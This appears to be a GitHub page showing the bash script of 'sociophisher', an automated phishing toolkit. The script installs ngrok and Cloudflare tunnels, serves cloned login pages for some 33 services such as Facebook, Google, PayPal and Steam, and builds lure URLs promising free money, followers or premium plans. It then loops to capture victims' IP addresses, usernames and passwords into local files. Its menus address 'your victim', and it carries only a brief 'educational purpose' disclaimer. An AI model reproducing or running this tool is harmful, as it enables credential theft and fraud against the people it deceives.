-
Notifications
You must be signed in to change notification settings - Fork 22
/
sociophisher.sh
678 lines (596 loc) Β· 20.2 KB
/
sociophisher.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
#!/bin/bash
## sociophisher : Automated Phishing Tool
## Author : ALEX BIEBER
## Version : 2.2
## Github : https://github.com/alexbieber
## If you Copy Then Give the credits :)
## ANSI colors (FG & BG)
RED="$(printf '\033[31m')" GREEN="$(printf '\033[32m')" ORANGE="$(printf '\033[33m')" BLUE="$(printf '\033[34m')"
MAGENTA="$(printf '\033[35m')" CYAN="$(printf '\033[36m')" WHITE="$(printf '\033[37m')" BLACK="$(printf '\033[30m')"
REDBG="$(printf '\033[41m')" GREENBG="$(printf '\033[42m')" ORANGEBG="$(printf '\033[43m')" BLUEBG="$(printf '\033[44m')"
MAGENTABG="$(printf '\033[45m')" CYANBG="$(printf '\033[46m')" WHITEBG="$(printf '\033[47m')" BLACKBG="$(printf '\033[40m')"
RESETBG="$(printf '\e[0m\n')"
## Directories
if [[ ! -d ".server" ]]; then
mkdir -p ".server"
fi
if [[ -d ".server/www" ]]; then
rm -rf ".server/www"
mkdir -p ".server/www"
else
mkdir -p ".server/www"
fi
if [[ -e ".cld.log" ]]; then
rm -rf ".cld.log"
fi
## Script termination
exit_on_signal_SIGINT() {
{ printf "\n\n%s\n\n" "${RED}[${WHITE}!${RED}]${RED} Program Interrupted." 2>&1; reset_color; }
exit 0
}
exit_on_signal_SIGTERM() {
{ printf "\n\n%s\n\n" "${RED}[${WHITE}!${RED}]${RED} Program Terminated." 2>&1; reset_color; }
exit 0
}
trap exit_on_signal_SIGINT SIGINT
trap exit_on_signal_SIGTERM SIGTERM
## Reset terminal colors
reset_color() {
tput sgr0 # reset attributes
tput op # reset color
return
}
## Kill already running process
kill_pid() {
if [[ `pidof php` ]]; then
killall php > /dev/null 2>&1
fi
if [[ `pidof ngrok` ]]; then
killall ngrok > /dev/null 2>&1
fi
if [[ `pidof cloudflared` ]]; then
killall cloudflared > /dev/null 2>&1
fi
}
## Banner
banner() {
cat <<- EOF
${PINK}
${PINK} ________ _ _
${PINK} | ______| (_) | |
${PINK} | |______ _ __ | |__ _ ___| |__ ___ _ __ π΄π΄π΄π΄π΄π΄π΄π΄π΄
${PINK} |______ | _____ | '_ \| '_ \| / __| '_ \ / _ \ '__| π΄π΄π΄π΄π΄π΄π΄π΄π΄
${PINK} | | |_____| | |_) | | | | \__ \ | | | __/ | π΄π΄π΄π΄π΄π΄π΄π΄π΄
${PINK}| ______| | | | |_| |_|_|___/_| |_|\___|_| | |π΄π΄π΄π΄π΄π΄π΄π΄π΄
${PINK} |________| | |
${PINK} |_| ${PINK}Version : 1.0
${GREEN}[${WHITE}-${GREEN}]${CYAN} Tool Created by alexbieber (ALEX BIEBER)${WHITE}
EOF
}
## Small Banner
banner_small() {
cat <<- EOF
${RED} π΄ π΄ π΄π΄π΄π΄ ππ
${RED} π΄ π΄ π΄ πππ
${RED} π΄ π΄ π΄ π΄ ππππ
${RED} π΄π΄ π΄π΄ π΄π΄π΄π΄ πππππ WELCOME ! ${WHITE} 2.2
EOF
}
## Dependencies
dependencies() {
echo -e "\n${GREEN}[${WHITE}+${GREEN}]${CYAN} Installing required packages..."
if [[ -d "/data/data/com.termux/files/home" ]]; then
if [[ `command -v proot` ]]; then
printf ''
else
echo -e "\n${GREEN}[${WHITE}+${GREEN}]${CYAN} Installing package : ${ORANGE}proot${CYAN}"${WHITE}
pkg install proot resolv-conf -y
fi
fi
if [[ `command -v php` && `command -v wget` && `command -v curl` && `command -v unzip` ]]; then
echo -e "\n${GREEN}[${WHITE}+${GREEN}]${GREEN} Packages already installed."
else
pkgs=(php curl wget unzip)
for pkg in "${pkgs[@]}"; do
type -p "$pkg" &>/dev/null || {
echo -e "\n${GREEN}[${WHITE}+${GREEN}]${CYAN} Installing package : ${ORANGE}$pkg${CYAN}"${WHITE}
if [[ `command -v pkg` ]]; then
pkg install "$pkg" -y
elif [[ `command -v apt` ]]; then
apt install "$pkg" -y
elif [[ `command -v apt-get` ]]; then
apt-get install "$pkg" -y
elif [[ `command -v pacman` ]]; then
sudo pacman -S "$pkg" --noconfirm
elif [[ `command -v dnf` ]]; then
sudo dnf -y install "$pkg"
else
echo -e "\n${RED}[${WHITE}!${RED}]${RED} Unsupported package manager, Install packages manually."
{ reset_color; exit 1; }
fi
}
done
fi
}
## Download Ngrok
download_ngrok() {
url="$1"
file=`basename $url`
if [[ -e "$file" ]]; then
rm -rf "$file"
fi
wget --no-check-certificate "$url" > /dev/null 2>&1
if [[ -e "$file" ]]; then
unzip "$file" > /dev/null 2>&1
mv -f ngrok .server/ngrok > /dev/null 2>&1
rm -rf "$file" > /dev/null 2>&1
chmod +x .server/ngrok > /dev/null 2>&1
else
echo -e "\n${RED}[${PINK}!${RED}]${RED} Error occured, Install Ngrok manually."
{ reset_color; exit 1; }
fi
}
## Download Cloudflared
download_cloudflared() {
url="$1"
file=`basename $url`
if [[ -e "$file" ]]; then
rm -rf "$file"
fi
wget --no-check-certificate "$url" > /dev/null 2>&1
if [[ -e "$file" ]]; then
mv -f "$file" .server/cloudflared > /dev/null 2>&1
chmod +x .server/cloudflared > /dev/null 2>&1
else
echo -e "\n${RED}[${PINK}!${RED}]${RED} Error occured, Install Cloudflared manually."
{ reset_color; exit 1; }
fi
}
## Install ngrok
install_ngrok() {
if [[ -e ".server/ngrok" ]]; then
echo -e "\n${PINK}[${PINK}+${PINK}]${PINK} Ngrok already installed."
else
echo -e "\n${PINK}[${WHITE}+${PINK}]${CYAN} Installing ngrok..."${WHITE}
arch=`uname -m`
if [[ ("$arch" == *'arm'*) || ("$arch" == *'Android'*) ]]; then
download_ngrok 'https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip'
elif [[ "$arch" == *'aarch64'* ]]; then
download_ngrok 'https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm64.zip'
elif [[ "$arch" == *'x86_64'* ]]; then
download_ngrok 'https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-amd64.zip'
else
download_ngrok 'https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-386.zip'
fi
fi
}
## Install Cloudflared
install_cloudflared() {
if [[ -e ".server/cloudflared" ]]; then
echo -e "\n${PINK}[${WHITE}+${PINK}]${PINK} Cloudflared already installed."
else
echo -e "\n${PINK}[${WHITE}+${PINK}]${CYAN} Installing Cloudflared..."${WHITE}
arch=`uname -m`
if [[ ("$arch" == *'arm'*) || ("$arch" == *'Android'*) ]]; then
download_cloudflared 'https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-arm'
elif [[ "$arch" == *'aarch64'* ]]; then
download_cloudflared 'https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-arm64'
elif [[ "$arch" == *'x86_64'* ]]; then
download_cloudflared 'https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-amd64'
else
download_cloudflared 'https://github.com/cloudflare/cloudflared/releases/latest/download/cloudflared-linux-386'
fi
fi
}
## Exit message
msg_exit() {
{ clear; banner; echo; }
echo -e "${GREENBG}${BLACK} Thank you for using this tool. Have a good day.${RESETBG}\n"
{ reset_color; exit 0; }
}
## About
about() {
{ clear; banner; echo; }
cat <<- EOF
${GREEN}Author ${RED}: ${ORANGE}Alex Bieber ${RED}[ ${ORANGE}Alex-Bieber ${RED}]
${GREEN}Github ${RED}: ${CYAN}https://github.com/alexbieber
${GREEN}Version ${RED}: ${ORANGE}2.2
${REDBG}${WHITE} Thanks : Adi1090x,MoisesTapia,ThelinuxChoice
DarkSecDevelopers,Alex Bieber,1RaY-1 ${RESETBG}
${RED}Warning:${WHITE}
${CYAN}This Tool is made for educational purpose only ${RED}!${WHITE}
${CYAN}Author will not be responsible for any misuse of this toolkit ${RED}!${WHITE}
${RED}[${WHITE}00${RED}]${ORANGE} Main Menu ${RED}[${WHITE}99${RED}]${ORANGE} Exit
EOF
read -p "${RED}[${WHITE}-${RED}]${PINK} Select an option : ${BLUE}"
case $REPLY in
99)
msg_exit;;
0 | 00)
echo -ne "\n${PINK}[${WHITE}+${PINK}]${CYAN} Returning to main menu..."
{ sleep 1; main_menu; };;
*)
echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."
{ sleep 1; about; };;
esac
}
## Setup website and start php server
HOST='127.0.0.1'
PORT='8080'
setup_site() {
echo -e "\n${RED}[${WHITE}-${RED}]${BLUE} Setting up server..."${WHITE}
cp -rf .sites/"$website"/* .server/www
cp -f .sites/ip.php .server/www/
echo -ne "\n${RED}[${WHITE}-${RED}]${BLUE} Starting PHP server..."${WHITE}
cd .server/www && php -S "$HOST":"$PORT" > /dev/null 2>&1 &
}
## Get IP address
capture_ip() {
IP=$(grep -a 'IP:' .server/www/ip.txt | cut -d " " -f2 | tr -d '\r')
IFS=$'\n'
echo -e "\n${RED}[${WHITE}-${RED}]${PINK} Victim's IP : ${BLUE}$IP"
echo -ne "\n${RED}[${WHITE}-${RED}]${BLUE} Saved in : ${ORANGE}ip.txt"
cat .server/www/ip.txt >> ip.txt
}
## Get credentials
capture_creds() {
ACCOUNT=$(grep -o 'Username:.*' .server/www/usernames.txt | awk '{print $2}')
PASSWORD=$(grep -o 'Pass:.*' .server/www/usernames.txt | awk -F ":." '{print $NF}')
IFS=$'\n'
echo -e "\n${RED}[${WHITE}-${RED}]${GREEN} Account : ${BLUE}$ACCOUNT"
echo -e "\n${RED}[${WHITE}-${RED}]${GREEN} Password : ${BLUE}$PASSWORD"
echo -e "\n${RED}[${WHITE}-${RED}]${BLUE} Saved in : ${ORANGE}usernames.dat"
cat .server/www/usernames.txt >> usernames.dat
echo -ne "\n${RED}[${WHITE}-${RED}]${ORANGE} Waiting for Next Login Info, ${BLUE}Ctrl + C ${ORANGE}to exit. "
}
## Print data
capture_data() {
echo -ne "\n${RED}[${WHITE}-${RED}]${ORANGE} Waiting for Login Info, ${BLUE}Ctrl + C ${ORANGE}to exit..."
while true; do
if [[ -e ".server/www/ip.txt" ]]; then
echo -e "\n\n${RED}[${WHITE}-${RED}]${GREEN} Victim IP Found !"
capture_ip
rm -rf .server/www/ip.txt
fi
sleep 0.75
if [[ -e ".server/www/usernames.txt" ]]; then
echo -e "\n\n${RED}[${WHITE}-${RED}]${GREEN} Login info Found !!"
capture_creds
rm -rf .server/www/usernames.txt
fi
sleep 0.75
done
}
## Start ngrok
start_ngrok() {
echo -e "\n${RED}[${WHITE}-${RED}]${GREEN} Initializing... ${GREEN}( ${CYAN}http://$HOST:$PORT ${GREEN})"
{ sleep 1; setup_site; }
echo -ne "\n\n${RED}[${WHITE}-${RED}]${GREEN} Launching Ngrok..."
if [[ `command -v termux-chroot` ]]; then
sleep 2 && termux-chroot ./.server/ngrok http "$HOST":"$PORT" > /dev/null 2>&1 & # Thanks to ALEX BIEBER (https://github.com/alexbieber)
else
sleep 2 && ./.server/ngrok http "$HOST":"$PORT" > /dev/null 2>&1 &
fi
{ sleep 8; clear; banner_small; }
ngrok_url=$(curl -s -N http://127.0.0.1:4040/api/tunnels | grep -o "https://[-0-9a-z]*\.ngrok.io")
ngrok_url1=${ngrok_url#https://}
echo -e "\n${RED}[${WHITE}-${RED}]${BLUE} URL 1 : ${GREEN}$ngrok_url"
echo -e "\n${RED}[${WHITE}-${RED}]${BLUE} URL 2 : ${GREEN}$mask@$ngrok_url1"
capture_data
}
## DON'T COPY PASTE WITHOUT CREDIT DUDE :')
## Start Cloudflared
start_cloudflared() {
rm .cld.log > /dev/null 2>&1 &
echo -e "\n${RED}[${WHITE}-${RED}]${GREEN} Initializing... ${GREEN}( ${CYAN}http://$HOST:$PORT ${GREEN})"
{ sleep 1; setup_site; }
echo -ne "\n\n${RED}[${WHITE}-${RED}]${GREEN} Launching Cloudflared..."
if [[ `command -v termux-chroot` ]]; then
sleep 2 && termux-chroot ./.server/cloudflared tunnel -url "$HOST":"$PORT" --logfile .cld.log > /dev/null 2>&1 &
else
sleep 2 && ./.server/cloudflared tunnel -url "$HOST":"$PORT" --logfile .cld.log > /dev/null 2>&1 &
fi
{ sleep 8; clear; banner_small; }
cldflr_link=$(grep -o 'https://[-0-9a-z]*\.trycloudflare.com' ".cld.log")
cldflr_link1=${cldflr_link#https://}
echo -e "\n${RED}[${WHITE}-${RED}]${BLUE} URL 1 : ${GREEN}$cldflr_link"
echo -e "\n${RED}[${WHITE}-${RED}]${BLUE} URL 2 : ${GREEN}$mask@$cldflr_link1"
capture_data
}
## Start localhost
start_localhost() {
echo -e "\n${RED}[${WHITE}-${RED}]${GREEN} Initializing... ${GREEN}( ${CYAN}http://$HOST:$PORT ${GREEN})"
setup_site
{ sleep 1; clear; banner_small; }
echo -e "\n${RED}[${WHITE}-${RED}]${GREEN} Successfully Hosted at : ${GREEN}${CYAN}http://$HOST:$PORT ${GREEN}"
capture_data
}
## Tunnel selection
tunnel_menu() {
{ clear; banner_small; }
cat <<- EOF
${RED}[${WHITE}01${RED}]${ORANGE} Localhost ${RED}[${CYAN}For Devs${RED}]
${RED}[${WHITE}02${RED}]${ORANGE} Ngrok.io ${RED}[${CYAN}Buggy${RED}]
${RED}[${WHITE}03${RED}]${ORANGE} Cloudflared ${RED}[${CYAN}NEW!${RED}]
EOF
read -p "${RED}[${WHITE}-${RED}]${GREEN} Select a port forwarding service : ${BLUE}"
case $REPLY in
1 | 01)
start_localhost;;
2 | 02)
start_ngrok;;
3 | 03)
start_cloudflared;;
*)
echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."
{ sleep 1; tunnel_menu; };;
esac
}
## Facebook
site_facebook() {
cat <<- EOF
${RED}[${WHITE}01${RED}]${PINK} Traditional Login Page
${RED}[${WHITE}02${RED}]${PINK} Advanced Voting Poll Login Page
${RED}[${WHITE}03${RED}]${PINK} Fake Security Login Page
${RED}[${WHITE}04${RED}]${PINK} Facebook Messenger Login Page
EOF
read -p "${RED}[${WHITE}-${RED}]${PINK} Select an option : ${BLUE}"
case $REPLY in
1 | 01)
website="facebook"
mask='http://blue-verified-badge-for-facebook-free'
tunnel_menu;;
2 | 02)
website="fb_advanced"
mask='http://vote-for-the-best-social-media'
tunnel_menu;;
3 | 03)
website="fb_security"
mask='http://make-your-facebook-secured-and-free-from-hackers'
tunnel_menu;;
4 | 04)
website="fb_messenger"
mask='http://get-messenger-premium-features-free'
tunnel_menu;;
*)
echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."
{ sleep 1; clear; banner_small; site_facebook; };;
esac
}
## Instagram
site_instagram() {
cat <<- EOF
${RED}[${WHITE}01${RED}]${PINK} Traditional Login Page
${RED}[${WHITE}02${RED}]${PINK} Auto Followers Login Page
${RED}[${WHITE}03${RED}]${PINK} 1000 Followers Login Page
${RED}[${WHITE}04${RED}]${PINK} Blue Badge Verify Login Page
EOF
read -p "${RED}[${WHITE}-${RED}]${PINK} Select an option : ${BLUE}"
case $REPLY in
1 | 01)
website="instagram"
mask='http://get-unlimited-followers-for-instagram'
tunnel_menu;;
2 | 02)
website="ig_followers"
mask='http://get-unlimited-followers-for-instagram'
tunnel_menu;;
3 | 03)
website="insta_followers"
mask='http://get-1000-followers-for-instagram'
tunnel_menu;;
4 | 04)
website="ig_verify"
mask='http://blue-badge-verify-for-instagram-free'
tunnel_menu;;
*)
echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."
{ sleep 1; clear; banner_small; site_instagram; };;
esac
}
## Gmail/Google
site_gmail() {
cat <<- EOF
${RED}[${WHITE}01${RED}]${YELLOW} Gmail Old Login Page
${RED}[${WHITE}02${RED}]${YELLOW} Gmail New Login Page
${RED}[${WHITE}03${RED}]${YELLOW} Advanced Voting Poll
EOF
read -p "${RED}[${WHITE}-${RED}]${YELLOW} Select an option : ${BLUE}"
case $REPLY in
1 | 01)
website="google"
mask='http://get-unlimited-google-drive-free'
tunnel_menu;;
2 | 02)
website="google_new"
mask='http://get-unlimited-google-drive-free'
tunnel_menu;;
3 | 03)
website="google_poll"
mask='http://vote-for-the-best-social-media'
tunnel_menu;;
*)
echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."
{ sleep 1; clear; banner_small; site_gmail; };;
esac
}
## Vk
site_vk() {
cat <<- EOF
${RED}[${WHITE}01${RED}]${ORANGE} Traditional Login Page
${RED}[${WHITE}02${RED}]${ORANGE} Advanced Voting Poll Login Page
EOF
read -p "${RED}[${WHITE}-${RED}]${GREEN} Select an option : ${BLUE}"
case $REPLY in
1 | 01)
website="vk"
mask='http://vk-premium-real-method-2020'
tunnel_menu;;
2 | 02)
website="vk_poll"
mask='http://vote-for-the-best-social-media'
tunnel_menu;;
*)
echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."
{ sleep 1; clear; banner_small; site_vk; };;
esac
}
## Menu
main_menu() {
{ clear; banner; echo; }
cat <<- EOF
${RED}[${WHITE}::${RED}]${ORANGE} Select An Attack For Your Victim ${RED}[${WHITE}::${RED}]${ORANGE}
${RED}[${WHITE}01${RED}]${ORANGE} Facebook ${RED}[${WHITE}11${RED}]${PINK} Twitch ${RED}[${WHITE}21${RED}]${YELLOW} DeviantArt
${RED}[${WHITE}02${RED}]${ORANGE} Instagram ${RED}[${WHITE}12${RED}]${PINK} Pinterest ${RED}[${WHITE}22${RED}]${YELLOW} Badoo
${RED}[${WHITE}03${RED}]${YELLOW} Google ${RED}[${WHITE}13${RED}]${BLUE} Snapchat ${RED}[${WHITE}23${RED}]${YELLOW} Origin
${RED}[${WHITE}04${RED}]${YELLOW} Microsoft ${RED}[${WHITE}14${RED}]${ORANGE} Linkedin ${RED}[${WHITE}24${RED}]${GREEN} DropBox
${RED}[${WHITE}05${RED}]${BLUE} Netflix ${RED}[${WHITE}15${RED}]${ORANGE} Ebay ${RED}[${WHITE}25${RED}]${GREEN} Yahoo
${RED}[${WHITE}06${RED}]${BLUE} Paypal ${RED}[${WHITE}16${RED}]${RED} Quora ${RED}[${WHITE}26${RED}]${RED} Wordpress
${RED}[${WHITE}07${RED}]${GREEN} Steam ${RED}[${WHITE}17${RED}]${RED} Protonmail ${RED}[${WHITE}27${RED}]${RED} Yandex
${RED}[${WHITE}08${RED}]${GREEN} Twitter ${RED}[${WHITE}18${RED}]${ORANGE} Spotify ${RED}[${WHITE}28${RED}]${ORANGE} StackoverFlow
${RED}[${WHITE}09${RED}]${ORANGE} Playstation ${RED}[${WHITE}19${RED}]${ORANGE} Reddit ${RED}[${WHITE}29${RED}]${ORANGE} Vk
${RED}[${WHITE}10${RED}]${ORANGE} Tiktok ${RED}[${WHITE}20${RED}]${BLUE} Adobe ${RED}[${WHITE}30${RED}]${PINK} XBOX
${RED}[${WHITE}31${RED}]${ORANGE} Mediafire ${RED}[${WHITE}32${RED}]${PINK} Gitlab ${RED}[${WHITE}33${RED}]${PINK} Github
${RED}[${WHITE}99${RED}]${PINK} About ${RED}[${WHITE}00${RED}]${BLUE} Exit
EOF
read -p "${RED}[${WHITE}-${RED}]${PINK} Select an option : ${BLUE}"
case $REPLY in
1 | 01)
site_facebook;;
2 | 02)
site_instagram;;
3 | 03)
site_gmail;;
4 | 04)
website="microsoft"
mask='http://unlimited-onedrive-space-for-free'
tunnel_menu;;
5 | 05)
website="netflix"
mask='http://upgrade-your-netflix-plan-free'
tunnel_menu;;
6 | 06)
website="paypal"
mask='http://get-500-usd-free-to-your-acount'
tunnel_menu;;
7 | 07)
website="steam"
mask='http://steam-500-usd-gift-card-free'
tunnel_menu;;
8 | 08)
website="twitter"
mask='http://get-blue-badge-on-twitter-free'
tunnel_menu;;
9 | 09)
website="playstation"
mask='http://playstation-500-usd-gift-card-free'
tunnel_menu;;
10)
website="tiktok"
mask='http://tiktok-free-liker'
tunnel_menu;;
11)
website="twitch"
mask='http://unlimited-twitch-tv-user-for-free'
tunnel_menu;;
12)
website="pinterest"
mask='http://get-a-premium-plan-for-pinterest-free'
tunnel_menu;;
13)
website="snapchat"
mask='http://view-locked-snapchat-accounts-secretly'
tunnel_menu;;
14)
website="linkedin"
mask='http://get-a-premium-plan-for-linkedin-free'
tunnel_menu;;
15)
website="ebay"
mask='http://get-500-usd-free-to-your-acount'
tunnel_menu;;
16)
website="quora"
mask='http://quora-premium-for-free'
tunnel_menu;;
17)
website="protonmail"
mask='http://protonmail-pro-basics-for-free'
tunnel_menu;;
18)
website="spotify"
mask='http://convert-your-account-to-spotify-premium'
tunnel_menu;;
19)
website="reddit"
mask='http://reddit-official-verified-member-badge'
tunnel_menu;;
20)
website="adobe"
mask='http://get-adobe-lifetime-pro-membership-free'
tunnel_menu;;
21)
website="deviantart"
mask='http://get-500-usd-free-to-your-acount'
tunnel_menu;;
22)
website="badoo"
mask='http://get-500-usd-free-to-your-acount'
tunnel_menu;;
23)
website="origin"
mask='http://get-500-usd-free-to-your-acount'
tunnel_menu;;
24)
website="dropbox"
mask='http://get-1TB-cloud-storage-free'
tunnel_menu;;
25)
website="yahoo"
mask='http://grab-mail-from-anyother-yahoo-account-free'
tunnel_menu;;
26)
website="wordpress"
mask='http://unlimited-wordpress-traffic-free'
tunnel_menu;;
27)
website="yandex"
mask='http://grab-mail-from-anyother-yandex-account-free'
tunnel_menu;;
28)
website="stackoverflow"
mask='http://get-stackoverflow-lifetime-pro-membership-free'
tunnel_menu;;
29)
site_vk;;
30)
website="xbox"
mask='http://get-500-usd-free-to-your-acount'
tunnel_menu;;
31)
website="mediafire"
mask='http://get-1TB-on-mediafire-free'
tunnel_menu;;
32)
website="gitlab"
mask='http://get-1k-followers-on-gitlab-free'
tunnel_menu;;
33)
website="github"
mask='http://get-1k-followers-on-github-free'
tunnel_menu;;
99)
about;;
0 | 00 )
msg_exit;;
*)
echo -ne "\n${RED}[${WHITE}!${RED}]${RED} Invalid Option, Try Again..."
{ sleep 1; main_menu; };;
esac
}
## Main
kill_pid
dependencies
install_ngrok
install_cloudflared
main_menu